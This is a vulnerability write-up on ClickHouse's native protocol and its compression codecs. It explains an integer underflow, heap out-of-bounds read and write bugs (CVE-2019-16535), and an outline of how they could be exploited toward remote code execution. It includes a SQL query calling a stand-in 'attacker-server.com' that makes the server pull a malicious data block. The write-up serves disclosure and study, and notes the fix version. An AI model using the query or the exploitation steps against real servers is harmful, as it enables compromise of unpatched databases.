ClickHouse is a fast and nice open-source OLAP database management system. Server provides multiple network interfaces: HTTP and Native protocol. One more interface is a replication protocol, we’ll talk about it next time.
HTTP interface is pretty simple but native one is complex and powerful, plus — it does not have formal spefication. Nice stuff to research.
TLDR: Native protocol is quite fragile and should be available to database administrators only
By default native protocol is available over port TCP/9000.
The first byte specifies the packet type. Server expects to receive Client::Hello (0) as first packet from a client.
It was nice to see that there is protection against SSRF inside Hello parsing function, if the first byte of the packet equals “G” or “P” then they are interpreted as HTTP GET and POST requests and the server will respond with HTTP code 400.
In Client::Hello packet a client must pass its name, version, database name, login and password for connection.
After authentication, the client can send one of the following types of packets:
- Client::Query (1) — SQL query, it’s query id, settings etc;
- Client::Data (2) — query data if requred (INSERT);
- Client::Cancel (3) — server interrupts the execution of the request, for example, if after the Query request the client decided not to send data;
- Client::Ping (4) — server always responds with Protocol::Server::Pong;
- TablesStatusRequest (5) — server must respond with a table replication status and a delay for replication;
- Client::KeepAlive (6) — keep alive.
Server can respond with one of the following types of packets:
- Server::Hello (0) — name, version;
- Server::Data (1) — data block;
- Server::Exception (2) — exception descriptions caused during a query execution;
- Server::Exception (2) — exception descriptions caused during a query execution;
- Server::Progress (3) — query progress (rows read, bytes etc);
- Server::Pong (4) — ответ на Protocol::Client::Ping;
- Server::EndOfStream (5) — EOF, all packets transferred;
- Server::ProfileInfo (6) — query profiling information;
- Server::Totals (7) — block with calculated table statistics;
- Server::Extremes (8) — block with mins and maxs;
- Server::TablesStatusResponse (9) — response to TablesStatusRequest;
- Server::Log (10) — query execution log;
- Server::TableColumns (11) — table columns schema.
Minimal client-server interaction example (INSERT request):
You can notice that in Query packet client can send serialized settings for query and connections. A client can enable or disable stack traces (enabled by default).
In older versions of ClickHouse client was able to override even readonly and elevate privileges.
For more effective data transfer, some packets (Data, Totals etc) can be compressed. Data IO is implemented with abstract class ReadBuffers.
Compressed buffers are implemented in CompressedReadBuffer.
For stream buffer implementation custom analogue of std::istream is used.
Several compression algorithms are available, each has its own implementation of interface CompressionCodec over a third-party library.
CompressionCodec implements the following methods:
- Byte specifying compression algorithm of current codec
Uint8 getMethodByte()
- Compression codec human-readable name (ZSTD, LZ4 etc)
String getCodecDesc()
- Compress data of
source_size
from buffersource
to preallocated bufferdest
and return size of compressed data
UInt32 comress(const char *source, UInt32 source_size, char *dest)
- Decompress data of
source_size
from buffersource
to preallocated bufferdest
and return size of decompressed data
UInt32 decompress(const char *source, UInt32 source_size, char *dest)
- Returns the number of bytes required to store compression of
uncompressed_size
using this algorithm
UInt32 getCompressedReserveSize(UInt32 uncompressed)
- The number of bytes at the end of the buffer required for the codec, by default = 0
UInt32 getAdditionalSizeAtTheEndOfBuffer()
- Size of compression header, by default = 9 bytes (COMPRESSED_BLOCK_HEADER_SIZE)
UInt8 getHeaderSize()
- Function reads compressed block size from user input
Int32 readCompressedBlockSize(const char* source)
- Function reads decompressed block size
static UInt32 readDecompressedBlockSize(const char* source)
- Reads codec byte
static UInt8 readMethod(conse char *source)
- Compress data of size
source_size
fromsource
and put todest
UInt32 doCompressData(const char* source, UInt32 source_size, char *dest)
- Decompress data of size
source_size
fromsource
and put todest
, size of decompressed data put touncompressed_size
void doDecompressData(const char *source, UInt32 source_size, char *dest, UInt32 uncompressed_size)
Some of you immediately caught that integers are used as size in these methods, while the rest of ClickHouse code is written in neat C++ using string literals and memsize types. Usually these very “joints” are the source of problems and vulnerabilities.
Every time you use the integer to store a buffer size, a cute puppy dies somewhere.
Client mostly controls the data which should be decompressed by server — let’s look at the corresponding methods.
The initial idea of this research was to implement fuzz tests for data reading methods and do not analyze them manually. For example you can separately fuzz column desription parser — they’re also read from a client. But ClickHouse uses checksum calculation for transferred data blocks, so fuzzing the network part without disabing checksum checking would be ineffective.
Let’s look at the function that reads data and calls codec implementations
Read from the buffer checksum (L25), header (L29), codec marker (L31).
Create instance of the codec if supported
- NONE (0x02) — no compression;
- LZ4 (0x82) — LZ4HC;
- ZSTD (0x90) — ZSTD;
- Multiple (0x91) — multiple layers;
- Delta (0x92) — Delta;
- T64 (0x93) — T64;
- DoubleDelta (0x94) — DoubleDelta;
- Gorilla (0x95) — Gorilla.
Read compressed data size (L42, controlled by the client), decompressed data size (L43, controlled by the client).
Check that data size is not too big (L45, DBMS_MAX_COMPRESSED_SIZE = 1Gb), resize buffers, read data and validate checksum (L69).
Allocate buffer of size_decompressed + getAdditionalSizeAtTheEndOfBuffer() and use it for decompress().
What’s wrong with this code?
There is no check for size_compressed_without_checksum >= header_size
.
The result of arithmetic operation on usigned integer is used as memsize type.
If the client sends size_compressed_without_checksum=1
then subtraction source_size-header_size
will result 1–9=0xfffffff8
and we get an integer underflow.
Further program behavior depends on how this data is used in wrappers over codecs (doDecompressData() method).
Let’s look inside of some of them, so codecs Delta, DoubleDelta, Gorilla have very similar beginning:
Client controls size_decompressed
(size of allocated buffer dest
), and bytes_to_skip
.
Sending size_decompresed=1
and bytes_to_skip=255
, client can overwrite up to 254 bytes of the neighboring heap object. It is a first step to RCE.
Modern Linux systems use various protection mechanisms preventing vulnerability exploitation, such as Address Space Layout Randomization (ASLR). In short, every time a binary is launched, its address space layout (including the heap and stack addresses) changes.
To exploit this vulnerability to RCE attacker will also need to leak libc and heap addresses.
Well, there is libc address in a traceback.
Let’s check Multiple codec for leak of addresses from the heap:
The data buffer is implemented as an analogue of std:: vector — PODArray, client data copied to it.
What if client sends compression_method_size=0
?
The loop will not run and the attacker will be able to copy decompressed_size
(which the client controls) bytes from compressed_buf
to dest
and get OOB read!
Now the attacker has three components to exploit the vulnerability:
- libc address
- OOB read on a heap
- OOB write on a heap
This vulnerability can also be triggered via SQL injection — using external tables.
Attacker runs fake ClickHouse server, sends a query
SELECT * FROM remote('attacker-server.com','default.blah','default','qwerty);
Fake server needs to answer with Hello, TableStatusResponse packets then send a malicious data block.
Vulnerable version of Clickhouse uses jemalloc 5.0 as an allocator.
Jemalloc stores metadata and allocated data separately so the usual heap overflow exploitation methods do not work here.
Jemalloc allocates memory in bins, which depend on allocated objects size.
That means — attacker can try to use type-confusion-like technique , find proper class (X), make ClickHouse allocate a sufficient number of objects of this class.
Then make codec allocate a buffer same size of object class X (so attackers buffer will be allocated in the same bin with target object), then try to overwrite its vtable with OOB write.
Sorry, there is no RCE PoC in this writeup.
This (CVE-2019–16535) and other vulnerabilities were fixed in ClickHouse version 19.14.3.3.